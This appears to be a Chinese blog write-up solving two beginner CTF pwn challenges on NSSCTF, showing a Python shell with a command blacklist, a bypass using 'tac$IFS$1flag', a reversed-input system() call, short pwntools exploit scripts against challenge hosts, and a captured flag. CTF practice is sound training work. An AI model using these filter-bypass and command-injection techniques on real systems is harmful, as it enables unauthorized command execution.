NSSCTFpwn刷题

[SWPUCTF 2021 新生赛]nc签到

打开附件里面内容

复制代码
import os

art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")

blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

blacklist是黑名单的意思

也就是说里面的内容都被禁了,所以我们需要绕过

cat可以用tac来代替

空格' ' 可以用 IFS1 代替,也就是tacIFS1flag

编写exp

复制代码
from pwn import*
p = remote('node4.anna.nssctf.cn',28808)
data = p.recv() 
p.sendline('tac$IFS$1flag')
p.interactive()

[NISACTF 2022]ReorPwn?

查看一下附件

复制代码
checksec 1

64位的,ok

找到main函数,F5

复制代码
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("evcexe ot tnaw uoy tahw em lleT:");
  gets(a);
  fun(a);
  system(a);
  return 0;
}

evcexe ot tnaw uoy tahw em lleT

Tell me what you want to execve

告诉我你想要执行什么

双击fun

双击system

分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。

直接galf tac得到flag

编写exp

复制代码
from pwn import*
p = remote("node4.anna.nssctf.cn",28447)
p.sendline('galf tac')
p.interactive()

NSSCTF{ee0c2423-7c37-4e3a-a969-430fbaf645d2}

相关推荐
码出财富5 小时前
SpringBoot 内置的 20 个高效工具类
java·spring boot·spring cloud·java-ee
沐知全栈开发5 小时前
Perl 数据库连接
开发语言
苏宸啊5 小时前
Linux权限
linux·运维·服务器
鄭在秀5 小时前
【SD-WAN介绍】
网络·网络安全·sd-wan
Gofarlic_oms15 小时前
Windchill用户登录与模块访问失败问题排查与许可证诊断
大数据·运维·网络·数据库·人工智能
我是小疯子665 小时前
Python变量赋值陷阱:浅拷贝VS深拷贝
java·服务器·数据库
森叶5 小时前
Java 比 Python 高性能的原因:重点在高并发方面
java·开发语言·python
xqhoj5 小时前
Linux——make、makefile
linux·运维·服务器
二哈喇子!5 小时前
Eclipse中导入外部jar包
java·eclipse·jar
微露清风5 小时前
系统性学习C++-第二十二讲-C++11
java·c++·学习